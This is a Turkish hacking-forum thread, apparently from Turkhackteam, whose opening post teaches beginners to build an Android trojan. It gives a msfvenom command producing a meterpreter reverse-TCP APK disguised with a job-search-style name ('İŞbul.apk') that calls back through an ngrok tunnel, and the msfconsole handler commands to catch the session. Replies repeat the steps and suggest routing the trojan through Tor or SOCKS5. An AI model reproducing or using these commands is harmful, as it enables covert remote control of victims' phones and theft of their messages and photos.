dış ağ trojan nasıl oluşturulur & trojan nedir

sefilbilo23

Kıdemli Üye
3 Tem 2021
2,223
9
900
22

YENİ BAŞLİYANLARA ÖZEL EĞİTİM !!!

TROJAN NEDİR : Trojan meşru yazılım kılığındaki bir tür kötü amaçlı yazılımdır. Genellikle siber suçlular tarafından gizli verileri çalmak, kullanıcılara karşı casusluk yapmak ve sistemlere izinsiz erişim elde etmek için kullanılır.

TROJAN NASIL ENGELLENİR ? : trojan genelikle internet ortamlardan bulaşır trojan önlemek için veya gizli bilgilerinizi çalınmaması için internet bağlantısını kesmeniz lazım ve format atmanız gerek eğer ki hemen kontrol etmeseniz verilerinizi çalıp özel mesajınızı ve galerinize sızılabilir ve ordan da sizi yıllarca takip edebilirler

TROJAN NASIL BULAŞIR : Trojan virüsü genellikle hileli programlar aracılığı ile bilgisayar sisteminize girerler. Bir web sitesindeki cazip görünen bir fotoğraf ve/veya linke tıkladığınızda virüs bilgisayarınıza sızabilir. Özellikle yasa dışı bannerlar, içeriğinde, trojan virüsü barındırmaktadır.

TROJAN NASIL OLUŞUR ? ( GÖRSEL ANLATIM )

öncelikle kali linux acalım daha sonra cd Masaüstü yapalım eğer ngrok kurdusanız masaüstüne alın

daha sonra yaptığım gibi http yerine tcp yapiyoruz ngroku çalıştırıyoruz

gördüğünüz gibi LPORT LHOST NGROK İLE AYNI burda diyoruz ki ngrok bana tcp portu ver oda olur ABİ verim diyor

bunu yapınca apk artık dinlemeye almaya çalışcaz bunun için MSFCONSOLE ÇALIŞTIRCAZ

çalıştırmadan ngrok kapatmayın eğer hata alırsanız baştan aşağa tekrar uygulamanız lazım

ve son olarak da dinlemeye alacağımız komutları giriyoruz ve run veya exploit yapıp HELP komutu çalıştırın ve hangi komutu çalıştırmak isterseniz kopyala yapıştırın

KOMUT VE KODLARI
msfvenom -p android/meterpreter/reverse_tcp LHOST=2.tcp.eu.ngrok.io LPORT=12426 R > İŞbul.apk

MSFCONSOLE
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 127.0.0.1
LHOST => 127.0.0.1
msf6 exploit(multi/handler) > set LPORT 8080
LPORT => 8080

Ç1nk0

Üye
6 Tem 2023
77
52
yeni başliyanlara özel demişim yanlız :(
Yeni başlayanlar eski yöntemleri değilde yeni yöntemleri öğrense daha iyi olur. Biz bunu öğrendik zamanında, onlarda öğrensin demek saçma bence. Mesela ftp serverlar nasıl hacklenir diye bir tane konu açılabilir, bilmiyorsanız, araştırıp öğrenebilirsiniz, sonrasında kendiniz foruma sunarsınız.

tamam ağa

Uzman üye
7 Haz 2023
1,534
13
876
ngrok stabil değil.
ayrıca her kapanıp açıldığında yanılmıyorsam adresi değişiyor ve para istiyor.

bunun yerine alternatif port yönlendirmesi yapmanız gerek.

misal tor üzerinden bağlantı yönlendirilebilirsiniz SOCK5 protokolü sayenizde port açmadan web sunucusu kurulabiliyor trojanı yine aynı şekilde SOCK5 protokolü ile web sunucusuna yönlendirilebilir.

PHP de ve python web de socket kütüphanesi mevcut

ama yinede emek vermişsin eline sağlık

@sefilbilo23

Son düzenleme:

sefilbilo23

Kıdemli Üye
3 Tem 2021
2,223
9
900
22
Yeni başlayanlar eski yöntemleri değilde yeni yöntemleri öğrense daha iyi olur. Biz bunu öğrendik zamanında, onlarda öğrensin demek saçma bence. Mesela ftp serverlar nasıl hacklenir diye bir tane konu açılabilir, bilmiyorsanız, araştırıp öğrenebilirsiniz, sonrasında kendiniz foruma sunarsınız.
olur da amacım yeni başliyanlara içindi :=)

ngrok stabil değil.
ayrıca her kapanıp açıldığında yanılmıyorsam adresi değişiyor ve para istiyor.

bunun yerine alternatif port yönlendirmesi yapmanız gerek.

misal tor üzerinden bağlantı yönlendirilebilirsiniz SOCK5 protokolü sayenizde port açmadan web sunucusu kurulabiliyor trojanı yine aynı şekilde SOCK5 protokolü ile web sunucusuna yönlendirilebilir.

PHP de ve python web de socket kütüphanesi mevcut

ama yinede emek vermişsin eline sağlık

@sefilbilo23
evet bunu bilmiyenler de olur en kolay yöntemi kullandım başka yolları da kullanırdım ama en kolay yol bu olduğu için kullandım yoksa modem de sabit internet veya duckdus gibi yerler de acardım

Butcherb3y

Uzman üye
1 Eyl 2022
1,617
7
1,199
Anıtkabir

TROJAN NEDİR : Trojan meşru yazılım kılığındaki bir tür kötü amaçlı yazılımdır. Genellikle siber suçlular tarafından gizli verileri çalmak, kullanıcılara karşı casusluk yapmak ve sistemlere izinsiz erişim elde etmek için kullanılır.

TROJAN NASIL ENGELLENİR ? : trojan genelikle internet ortamlardan bulaşır trojan önlemek için veya gizli bilgilerinizi çalınmaması için internet bağlantısını kesmeniz lazım ve format atmanız gerek eğer ki hemen kontrol etmeseniz verilerinizi çalıp özel mesajınızı ve galerinize sızılabilir ve ordan da sizi yıllarca takip edebilirler

TROJAN NASIL BULAŞIR : Trojan virüsü genellikle hileli programlar aracılığı ile bilgisayar sisteminize girerler. Bir web sitesindeki cazip görünen bir fotoğraf ve/veya linke tıkladığınızda virüs bilgisayarınıza sızabilir. Özellikle yasa dışı bannerlar, içeriğinde, trojan virüsü barındırmaktadır.

öncelikle kali linux acalım daha sonra cd Masaüstü yapalım eğer ngrok kurdusanız masaüstüne alın

gördüğünüz gibi LPORT LHOST NGROK İLE AYNI burda diyoruz ki ngrok bana tcp portu ver oda olur ABİ verim diyor

bunu yapınca apk artık dinlemeye almaya çalışcaz bunun için MSFCONSOLE ÇALIŞTIRCAZ

çalıştırmadan ngrok kapatmayın eğer hata alırsanız baştan aşağa tekrar uygulamanız lazım

ve son olarak da dinlemeye alacağımız komutları giriyoruz ve run veya exploit yapıp HELP komutu çalıştırın ve hangi komutu çalıştırmak isterseniz kopyala yapıştırın

KOMUT VE KODLARI
msfvenom -p android/meterpreter/reverse_tcp LHOST=2.tcp.eu.ngrok.io LPORT=12426 R > İŞbul.apk

MSFCONSOLE
LHOST => 127.0.0.1
LPORT => 8080

Elinize sağlık

rootibo

Kıdemli Üye
13 Mar 2023
2,168
12
1,460

KOMUT VE KODLARI

MSFCONSOLE
LHOST => 127.0.0.1
LPORT => 8080

Elinize saglik ancak boyle payloadlar eskide kaldi yeni seyler ogrenme vaktidir ama yeni arkadaslar icin faydali konu

sefilbilo23

Kıdemli Üye
3 Tem 2021
2,223
9
900
22
Elinize saglik ancak boyle payloadlar eskide kaldi yeni seyler ogrenme vaktidir ama yeni arkadaslar icin faydali konu
evet bilerek yaptım daha iyisini beceremezler eskiden herkes böyledi yavaş yavaş öğrenirler tipki web hacklerken shll kullandığımız gibi :)

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.